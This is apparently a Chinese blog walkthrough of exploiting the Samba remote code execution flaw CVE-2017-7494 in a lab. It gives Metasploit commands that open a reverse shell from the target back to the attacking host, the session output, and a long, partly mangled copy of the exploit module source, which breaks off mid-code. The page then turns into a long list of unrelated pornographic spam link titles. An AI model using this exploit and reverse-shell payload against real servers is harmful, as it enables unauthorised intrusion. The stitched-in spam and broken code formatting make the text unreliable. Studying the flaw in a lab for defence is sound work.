Samba遠程代碼執(zhí)行漏洞的實例詳解

509

samba是在linux和unix系統(tǒng)上實現(xiàn)smb協(xié)議的一個軟件。

2017年5月24日Samba發(fā)布了4.6.4版本,中間修復(fù)了一個嚴(yán)重的遠程代碼執(zhí)行漏洞,漏洞編號CVE-2017-7494,漏洞影響了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中間的所有版本。

360網(wǎng)絡(luò)安全中心 和 360信息安全部的Gear Team第一時間對該漏洞進行了分析,確認屬于嚴(yán)重漏洞,可以造成遠程代碼執(zhí)行。

漏洞簡述

▼▼

漏洞編號:CVE-2017-7494

危害等級:嚴(yán)重

影響版本:Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中間版本

漏洞描述:2017年5月24日Samba發(fā)布了4.6.4版本,修復(fù)了一個嚴(yán)重的遠程代碼執(zhí)行漏洞,該漏洞影響了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中間的所有版本。

技術(shù)分析

▼▼

如官方所描述,該漏洞只需要通過一個可寫入的Samba用戶權(quán)限就可以提權(quán)到samba所在服務(wù)器的root權(quán)限(samba默認是root用戶執(zhí)行的)。

一、復(fù)現(xiàn)環(huán)境搭建

搭建Debian和kali兩個虛擬機: 攻擊機:kali (192.168.217.162); 靶機:debian (192.168.217.150)。

二、Debian安裝并配置samba

1、首先,下載安裝samba服務(wù)器

# apt-get install samba

2、在debian下創(chuàng)建一個共享目錄,我這里為/mnt/shared

# mkdir  /mnt/shared

3、配置samba服務(wù)器的配置文件/etc/samba/smb.conf,在最后添加:

[shared]    comment = 'Share for work'    path= /mnt/shared    guest ok = yes    public = yes    writable = yes    create mask = 0777

4、設(shè)置/mnt/shared權(quán)限

# chmod –R /mnt/sspaned

5、重啟samba服務(wù)

# /etc/init.d/samba restart

三、設(shè)置攻擊機kali

打開kali終端進入到metasploit的exploit目錄下的linux文件夾,并新建一個smb文件夾,將攻擊腳本放入其中:

# cd /usr/share/metasploit-framework/modules/exploits/linux  # mkdir smb  # wget

運行metasploit,開始進行攻擊(攻擊腳本被我重命名為(cve-2017-7494.rb)

# msfconsole  msf > use exploit/linux/smb/cve-2017-7494  msf exploit(cve-2017-7494) > set rhost 192.168.217.150  rhost => 192.168.217.150  msf exploit(cve-2017-7494) > set payload linux/x64/shell/reverse_tcp  payload => linux/x64/shell/reverse_tcp  msf exploit(cve-2017-7494) > set lhost 192.168.217.162  rhost => 192.168.217.162  msf exploit(cve-2017-7494) > run  [*] Started reverse TCP handler on 192.168.217.162:4444  [*] 192.168.217.150:445 - Using location 192.168.217.150shared for the path  [*] 192.168.217.150:445 - Payload is stored in //192.168.217.150/shared/ as WzyvkESS.so  [*] 192.168.217.150:445 - Trying location /volume1/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /volume1/shared/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /volume1/SHARED/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /volume1/Shared/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /volume2/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /volume2/shared/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /volume2/SHARED/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /volume2/Shared/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /volume3/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /volume3/shared/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /volume3/SHARED/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /volume3/Shared/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /shared/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /shared/shared/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /shared/SHARED/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /shared/Shared/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /mnt/WzyvkESS.so...  [*] 192.168.217.150:445 - Trying location /mnt/shared/WzyvkESS.so...  [*] Sending stage (38 bytes) to 192.168.217.150  [*] Command shell session 2 opened (192.168.217.162:4444 -> 192.168.217.150:56540) at 2017-05-26 01:17:48 -0400    id  uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)    ifconfig  eth0 Link encap:Ethernet HWaddr 00:0c:29:6e:9a:4a  inet addr:192.168.217.150 Bcast:192.168.217.255 Mask:255.255.255.0  inet6 addr: fe80::20c:29ff:fe6e:9a4a/64 Scope:Link  UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1  RX packets:6769 errors:0 dropped:0 overruns:0 frame:0  TX packets:700 errors:0 dropped:0 overruns:0 carrier:0  collisions:0 txqueuelen:1000  RX bytes:479898 (468.6 KiB) TX bytes:102796 (100.3 KiB)  lo Link encap:Local Loopback  inet addr:127.0.0.1 Mask:255.0.0.0  inet6 addr: ::1/128 Scope:Host  UP LOOPBACK RUNNING MTU:65536 Metric:1  RX packets:35 errors:0 dropped:0 overruns:0 frame:0  TX packets:35 errors:0 dropped:0 overruns:0 carrier:0  collisions:0 txqueuelen:0  RX bytes:3557 (3.4 KiB) TX bytes:3557 (3.4 KiB)    whoami  nobody

POC:

  1 ##  2 # This module requires Metasploit:   3 # Current source:   4 ##  5   6 class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client def initialize(info = {}) super(update_info(info, 'Name' => 'Samba is_known_pipename() Arbitrary Module Load',  7       'Description'    => %q{  8           This module triggers an arbitrary shared library load vulnerability  9         in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module 10         requires valid credentials, a writeable folder in an accessible share, 11         and knowledge of the server-side path of the writeable folder. In 12         some cases, anonymous access combined with common filesystem locations 13         can be used to automatically exploit this vulnerability. 14       }, 15       'Author'         => 16         [ 17           'steelo <knownsteelo[at]gmail.com>',    # Vulnerability Discovery 18           'hdm',                                  # Metasploit Module 19         ], 20       'License'        => MSF_LICENSE, 21       'References'     => 22         [ 23           [ 'CVE', '2017-7494' ], 24           [ 'URL', '' ], 25         ], 26       'Payload'         => 27         { 28           'Space'       => 9000, 29           'DisableNops' => true 30         }, 31       'Platform'        => 'linux', 32       # 33       # Targets are currently limited by platforms with ELF-SO payload wrappers 34       # 35       'Targets'         => 36         [ 37           [ 'Linux ARM (LE)',   { 'Arch' => ARCH_ARMLE } ], 38           [ 'Linux x86',        { 'Arch' => ARCH_X86 } ], 39           [ 'Linux x86_64',     { 'Arch' => ARCH_X64 } ], 40         # [ 'Linux MIPS',       { 'Arch' => MIPS } ], 41         ], 42       'Privileged'      => true, 43       'DisclosureDate'  => 'Mar 24 2017', 44       'DefaultTarget'   => 2)) 45  46     register_options( 47       [ 48         OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']), 49         OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']), 50         OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']), 51       ]) 52   end 53  54  55   def generate_common_locations 56     candidates = [] 57     if datastore['SMB_SHARE_BASE'].to_s.length > 0 58       candidates << datastore['SMB_SHARE_BASE'] 59     end 60  61     %W{/volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media /var/samba /tmp /home /home/shared}.each do |base_name| 62       candidates << base_name 63       candidates << [base_name, @share] 64       candidates << [base_name, @share.downcase] 65       candidates << [base_name, @share.upcase] 66       candidates << [base_name, @share.capitalize] 67       candidates << [base_name, @share.gsub(" ", "_")] 68     end 69  70     candidates.uniq 71   end 72  73   def enumerate_directories(share) 74     begin 75       self.simple.connect("\#{rhost}#{share}") 76       stuff = self.simple.client.find_first("*") 77       directories = [""] 78       stuff.each_pair do |entry,entry_attr| 79         next if %W{. ..}.include?(entry) 80         next unless entry_attr['type'] == 'D' 81         directories << entry end return directories rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e 82       vprint_error("Enum #{share}: #{e}") 83       return nil 84  85     ensure 86       if self.simple.shares["\#{rhost}#{share}"] 87         self.simple.disconnect("\#{rhost}#{share}") 88       end 89     end 90   end 91  92   def verify_writeable_directory(share, directory="") 93     begin 94       self.simple.connect("\#{rhost}#{share}") 95  96       random_filename = Rex::Text.rand_text_alpha(5)+".txt" 97       filename = directory.length == 0 ? "#{random_filename}" : "#{directory}#{random_filename}" 98  99       wfd = simple.open(filename, 'rwct')100       wfd << Rex::Text.rand_text_alpha(8) wfd.close simple.delete(filename) return true rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e101       vprint_error("Write #{share}#{filename}: #{e}")102       return false103 104     ensure105       if self.simple.shares["\#{rhost}#{share}"]106         self.simple.disconnect("\#{rhost}#{share}")107       end108     end109   end110 111   def share_type(val)112     [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]113   end114 115   def enumerate_shares_lanman116     shares = []117     begin118       res = self.simple.client.trans(119         "PIPELANMAN",120         (121           [0x00].pack('v') +122           "WrLeh

亚洲国产成人久久一区久久|
亚洲国产日韩欧美综合久久|
欧美精品九九99久久在观看|
2021少妇久久久久久久久久|
一日本道伊人久久综合影|
亚洲国产精品久久久久|
国产情侣久久久久aⅴ免费|
久久久久亚洲国产|
蜜臀久久99精品久久久久久|
色综合久久中文综合网|
97久久精品无码一区二区天美|
亚洲精品无码专区久久久
|
亚洲AV无码久久精品蜜桃|
天堂无码久久综合东京热|
久久黄色视频|
久久成人国产精品一区二区|
99久久www免费人成精品|
天天久久狠狠色综合|
久久免费线看线看|
91精品国产91久久久久久|
国产精品综合久久第一页|
国産精品久久久久久久|
久久久久人妻一区精品|
久久精品亚洲男人的天堂
|
人妻少妇精品久久|
深夜久久AAAAA级毛片免费看|
亚洲国产成人久久综合一区77|
人人狠狠综合88综合久久|
日韩欧美亚洲综合久久|
国内精品久久久久久久久电影网|
久久精品亚洲AV久久久无码|
色婷婷综合久久久久中文一区二区|
伊人久久大香线蕉亚洲|
996久久国产精品线观看|
99久久精品无码一区二区毛片|
久久久99精品成人片中文字幕|
亚洲欧美国产日韩综合久久|
一日本道伊人久久综合影|
久久国产精品成人片免费|
中文精品久久久久国产网址|
久久人人超碰精品CAOPOREN|